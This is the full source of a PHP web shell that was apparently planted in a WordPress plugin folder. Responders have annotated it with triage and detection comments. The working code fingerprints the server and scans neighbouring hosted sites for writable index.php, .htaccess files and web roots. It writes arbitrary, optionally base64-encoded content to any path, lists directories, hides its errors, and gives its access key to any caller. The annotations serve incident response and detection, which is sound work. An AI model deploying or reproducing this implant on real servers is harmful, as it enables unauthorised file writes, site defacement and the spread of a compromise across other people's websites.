PATH: home/fengshp/www/wp-content/plugins/mqykrsx
<?php
/**
 * Lateral Scan - Minimal PHP scanner
 * PHP 5.4+ compatible, used in place of xshapi
 * Only scan + write + info
 *
 * NOTE(review): this is a web shell, not plugin code. It exposes five
 * request-driven actions (get_master_key, info, scan, write, ls) and answers
 * in JSON. Its purpose, as the code below shows, is to enumerate the other
 * sites hosted under the same account/server, report which of them have a
 * writable index.php, .htaccess or web root, and write caller-supplied bytes
 * to a caller-supplied path.
 *
 * Triage notes for responders:
 *  - Finding this file means every site reachable by the PHP user has to be
 *    checked, not only the site it was found in (see the 'scan' and 'write'
 *    actions).
 *  - Access logs: look for requests to this script carrying `action=` and
 *    `key=` parameters; the action names are listed in the default branch.
 *  - The header mentions another tool ("xshapi") that SOURCE does not show;
 *    presumably a sibling implant, so search for it as well (TODO confirm).
 */

// All PHP errors are hidden, so a failed action leaves no notice/warning
// output for the site owner to notice.
error_reporting(0);
header('Content-Type: application/json');

// Parameters are read from $_REQUEST, so they may arrive in the query string
// or the POST body; a POST body is usually absent from web-server access logs.
$key = isset($_REQUEST['key']) ? $_REQUEST['key'] : '';
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';

// The master key is derived from the file path.
// NOTE(review): the key is md5(script path + fixed string), truncated to 24
// hex chars and prefixed with 'LSC_'. It is a deterministic function of where
// the file sits, not a secret. The 'LSC_' prefix and the 'lateral-2026'
// constant are usable as static signatures when sweeping a filesystem.
$MASTER_KEY = 'LSC_' . substr(md5(__FILE__ . 'lateral-2026'), 0, 24);

// get_master_key works without a password.
// NOTE(review): this branch runs before the key check and returns the key to
// any caller, so the key check below is not access control. Treat the implant
// as usable by any third party that discovers the URL, not only by whoever
// planted it.
if ($action === 'get_master_key') {
    echo json_encode(array('master_key' => $MASTER_KEY));
    exit;
}

// Every other action requires the key to match exactly.
if ($key !== $MASTER_KEY) {
    echo json_encode(array('error' => 'invalid key'));
    exit;
}

switch ($action) {
    // 'info': host fingerprint (PHP version, script owner, working directory,
    // document root, uname string, path of this script).
    case 'info':
        echo json_encode(array(
            'php' => phpversion(),
            'user' => get_current_user(),
            'cwd' => getcwd(),
            'docroot' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(),
            'os' => php_uname(),
            'script' => __FILE__,
        ));
        break;

    // 'scan': enumerate neighbouring site directories and report which ones
    // the PHP process can modify. Read-only apart from one shell call to find.
    case 'scan':
        $results = array('all_domains' => array(), 'writable_domains' => array(), 'server_info' => array(
            'document_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(),
            'current_user' => get_current_user(),
            'scan_time' => date('Y-m-d H:i:s'),
            'scanned_root' => null,
        ));

        // Find the user home from the document root.
        $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd();

        // cPanel addon domain layout: /home/USER/public_html/DOMAIN/
        // Ordinary shared hosting: /home/DOMAIN/ or /var/www/DOMAIN/
        $roots = array();

        // 1) Subdirectories under public_html (cPanel addon domains)
        // docroot = /home/xxx/public_html -> scan below public_html
        if (preg_match('#^(/home/[^/]+/public_html)#', $docRoot, $m)) {
            $roots[] = $m[1];
        }
        // It may also be the parent directory.
        $parentOfDocroot = dirname($docRoot);
        if (is_dir($parentOfDocroot . '/public_html')) {
            $roots[] = $parentOfDocroot . '/public_html';
        }
        // User home directory (the parent of public_html)
        if (preg_match('#^(/home/[^/]+)/#', $docRoot, $m)) {
            $userHome = $m[1];
            if (is_dir($userHome . '/public_html')) {
                $roots[] = $userHome . '/public_html';
            }
            // HestiaCP/VestaCP: /home/USER/domains/
            if (is_dir($userHome . '/domains')) {
                $roots[] = $userHome . '/domains';
            }
            // CWP: /home/USER/public_html/ or /home/USER/www/
            if (is_dir($userHome . '/www')) {
                $roots[] = $userHome . '/www';
            }
            $roots[] = $userHome;
        }
        // Derive the hosting root from the docroot: /hosting/www/, /var/www/ etc.
        if (preg_match('#^(/hosting/www|/var/www|/var/www/vhosts)/#', $docRoot, $m)) {
            $roots[] = $m[1];
        }

        // Parent directory of the docroot - the most important one (ISPmanager, custom layouts)
        // /var/www/user/data/www/domain.com -> /var/www/user/data/www/
        $docParent = dirname($docRoot);
        if ($docParent && $docParent !== '/' && $docParent !== $docRoot) {
            array_unshift($roots, $docParent); // prepend so it is tried first
        }

        // 2) Classic shared-hosting directories
        // NOTE(review): these server-wide roots are only readable when sites are
        // not isolated from each other (no per-site user, no open_basedir
        // restriction). Whether they are readable here is the measure of how far
        // the compromise can spread.
        $roots = array_merge($roots, array(
            '/mnt/www', '/var/www', '/hosting/www', '/home', '/var/www/vhosts', '/var/www/html',
            dirname(dirname($docRoot))
        ));
        $roots = array_unique(array_filter($roots));

        $domains = array();
        $scannedRoot = null;
        // Directory names that are never treated as a site.
        $skip = array('.', '..', 'backups', 'logs', 'tmp', 'cache', 'lost+found', 'cgi-bin', '.well-known', 'wp-admin', 'wp-content', 'wp-includes');

        foreach ($roots as $root) {
            if (!is_dir($root) || !is_readable($root)) continue;
            // '@' suppresses the warning scandir would raise on failure.
            $items = @scandir($root);
            if (!$items) continue;

            $found = array();
            foreach ($items as $item) {
                if (in_array($item, $skip)) continue;
                if ($item[0] === '.') continue; // hidden dirs
                $fp = $root . '/' . $item;
                if (is_dir($fp)) {
                    $found[] = array('name' => $item, 'path' => $fp);
                }
            }

            // Does this directory contain subdirectories that look like domains?
            // (Heuristic: the directory name contains a dot.)
            $hasDomains = false;
            foreach ($found as $f) {
                if (strpos($f['name'], '.') !== false) {
                    $hasDomains = true;
                    break;
                }
            }

            if ($hasDomains) {
                // Directory that contains domains - best result
                if (!$scannedRoot) {
                    $scannedRoot = $root;
                    $domains = $found;
                } else {
                    // Append to the previous result (domains in other directories)
                    $domains = array_merge($domains, $found);
                }
                // public_html + domains is the best case - stop
                if (strpos($root, 'public_html') !== false || strpos($root, 'domains') !== false) {
                    break;
                }
            }
        }

        // Remove duplicate domains (first occurrence of each name wins).
        $seen = array();
        $unique = array();
        foreach ($domains as $d) {
            if (!isset($seen[$d['name']])) {
                $seen[$d['name']] = true;
                $unique[] = $d;
            }
        }
        $domains = $unique;

        // -- Fallback method: search for wp-config.php with find --
        // If the directory scan returned nothing or very little, locate all WP sites with find.
        if (count($domains) < 2) {
            $wpConfigs = array();
            // Search in readable parent directories.
            $searchPaths = array();
            if (preg_match('#^(/home/[^/]+)/#', $docRoot, $hm)) {
                $searchPaths[] = $hm[1]; // user home
            }
            $searchPaths[] = '/home';
            $searchPaths[] = '/var/www';
            $searchPaths[] = '/var/www/vhosts';

            foreach ($searchPaths as $sp) {
                if (!is_dir($sp) || !is_readable($sp)) continue;
                $findResult = array();
                // NOTE(review): the only shell execution in the file. The search
                // path comes from the fixed list above (or the docroot match), is
                // passed through escapeshellarg(), and no request parameter
                // reaches the command line. Detection: a `find ... -name
                // 'wp-config.php'` child process spawned by the PHP/web-server
                // user is a strong signal in process auditing; listing exec in
                // disable_functions makes this fallback unavailable.
                @exec("find " . escapeshellarg($sp) . " -maxdepth 5 -name 'wp-config.php' -not -path '*/backup*' -not -path '*/cache*' 2>/dev/null | head -50", $findResult);
                if (!empty($findResult)) {
                    $wpConfigs = array_merge($wpConfigs, $findResult);
                    break; // the first successful find is enough
                }
            }

            // Derive domain name and web root from the wp-config.php paths.
            $findDomains = array();
            foreach ($wpConfigs as $configPath) {
                $webRoot = dirname($configPath);
                // Skip the site this script itself runs in.
                if ($webRoot === $docRoot || $webRoot === rtrim($docRoot, '/')) continue;

                // Derive the domain name from the directory structure.
                $parts = explode('/', trim($webRoot, '/'));
                $domainName = null;

                // /home/user/public_html/domain.com/ or /home/user/domain.com/
                // The last dotted path component longer than 3 chars wins.
                foreach ($parts as $p) {
                    if (strpos($p, '.') !== false && !in_array($p, array('public_html', 'httpdocs', 'www')) && $p[0] !== '.' && strlen($p) > 3) {
                        $domainName = $p;
                    }
                }
                // If no domain was found, fall back to the last directory name.
                if (!$domainName) {
                    $last = end($parts);
                    if (strlen($last) > 2 && $last !== 'public_html' && $last !== 'httpdocs' && $last !== 'html') {
                        $domainName = $last;
                    }
                }

                if ($domainName && !isset($seen[$domainName])) {
                    $seen[$domainName] = true;
                    $domains[] = array('name' => $domainName, 'path' => $webRoot, '_webroot' => $webRoot);
                    $findDomains[] = $domainName;
                    // Assign the web root directly so the loop below does not search for it again.
                    // web_root is set from it when the entry is added to all_domains.
                }
            }

            if (!empty($findDomains)) {
                $results['server_info']['find_method'] = true;
                $results['server_info']['find_count'] = count($findDomains);
                if (!$scannedRoot) $scannedRoot = 'find';
            }
        }

        $results['server_info']['scanned_root'] = $scannedRoot;

        // Resolve each candidate's web root, then test what is writable there.
        foreach ($domains as $d) {
            // For domains found via find the web root is already known.
            if (!empty($d['_webroot'])) {
                $webRoot = $d['_webroot'];
            } else {
                $webRoots = array($d['path'], $d['path'].'/public', $d['path'].'/public_html', $d['path'].'/www', $d['path'].'/httpdocs', $d['path'].'/web');
                $webRoot = null;
                // First pass: a candidate directory that holds an index file.
                foreach ($webRoots as $wr) {
                    if (is_dir($wr) && (file_exists($wr.'/index.php') || file_exists($wr.'/index.html'))) {
                        $webRoot = $wr;
                        break;
                    }
                }
                // Second pass: any candidate directory that is readable.
                if (!$webRoot) {
                    foreach ($webRoots as $wr) {
                        if (is_dir($wr) && is_readable($wr)) {
                            $webRoot = $wr;
                            break;
                        }
                    }
                }
            } // end else (_webroot)

            // NOTE(review): these three checks name the files to inspect during
            // cleanup: index.php and .htaccess in each web root, plus new files in
            // any web root that is itself writable. Compare them against a known
            // good copy or backup for every domain the PHP user can reach.
            $isWp = $webRoot && file_exists($webRoot . '/wp-config.php');
            $indexWritable = $webRoot && file_exists($webRoot . '/index.php') && is_writable($webRoot . '/index.php');
            $htaccessWritable = $webRoot && file_exists($webRoot . '/.htaccess') && is_writable($webRoot . '/.htaccess');
            $dirWritable = $webRoot && is_writable($webRoot);

            $info = array(
                'domain' => $d['name'],
                'path' => $d['path'],
                'web_root' => $webRoot,
                'wordpress' => $isWp,
                'accessible' => is_readable($d['path']),
            );
            $results['all_domains'][] = $info;

            if ($indexWritable || $htaccessWritable || $dirWritable) {
                $wInfo = array('domain' => $d['name'], 'web_root' => $webRoot, 'files' => array());
                if ($indexWritable) $wInfo['files'][] = array('type' => 'index.php', 'path' => $webRoot.'/index.php');
                if ($htaccessWritable) $wInfo['files'][] = array('type' => '.htaccess', 'path' => $webRoot.'/.htaccess');
                if ($dirWritable) $wInfo['files'][] = array('type' => 'dir_writable', 'path' => $webRoot);
                $results['writable_domains'][] = $wInfo;
            }
        }

        // Totals for the JSON response.
        $results['server_info']['total_found'] = count($results['all_domains']);
        $wpCount = 0;
        foreach ($results['all_domains'] as $ad) {
            if ($ad['wordpress']) $wpCount++;
        }
        $results['summary'] = array(
            'total_domains' => count($results['all_domains']),
            'writable_count' => count($results['writable_domains']),
            'wordpress_count' => $wpCount,
        );

        echo json_encode($results);
        break;

    // 'write': store request-supplied content at a request-supplied path.
    // NOTE(review): neither the path nor the content is restricted in any way;
    // the only limit is what the PHP user may write on disk. `base64` is a
    // presence flag (any value, even empty, triggers decoding), so payloads can
    // cross a WAF or log pipeline encoded. Because the script sets no
    // timestamps, mtime/ctime on written files is still a usable lead: sweep
    // for files changed after this script's own creation time.
    case 'write':
        $path = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
        $content = isset($_REQUEST['content']) ? $_REQUEST['content'] : '';
        $isB64 = isset($_REQUEST['base64']);
        if ($isB64) $content = base64_decode($content);
        // '@' hides the warning on failure; the result is reported in JSON only.
        $r = @file_put_contents($path, $content);
        if ($r === false) {
            echo json_encode(array('error' => 'write failed'));
        } else {
            echo json_encode(array('success' => true, 'path' => $path, 'size' => $r));
        }
        break;

    // 'ls': list any directory the PHP user can read, with type, size and a
    // writable flag per entry. Defaults to the current working directory.
    case 'ls':
        $path = isset($_REQUEST['path']) ? $_REQUEST['path'] : getcwd();
        if (!is_dir($path)) {
            echo json_encode(array('error' => 'not a dir'));
            break;
        }
        $items = array();
        foreach (scandir($path) as $f) {
            if ($f === '.' || $f === '..') continue;
            $fp = rtrim($path,'/') . '/' . $f;
            $items[] = array('name' => $f, 'type' => is_dir($fp) ? 'dir' : 'file', 'size' => is_file($fp) ? filesize($fp) : 0, 'writable' => is_writable($fp));
        }
        echo json_encode(array('path' => $path, 'count' => count($items), 'items' => $items));
        break;

    // Unknown action: the response enumerates the supported action names, which
    // makes this literal string a convenient content signature for scanners.
    default:
        echo json_encode(array('error' => 'unknown action', 'actions' => 'get_master_key, info, scan, write, ls'));
}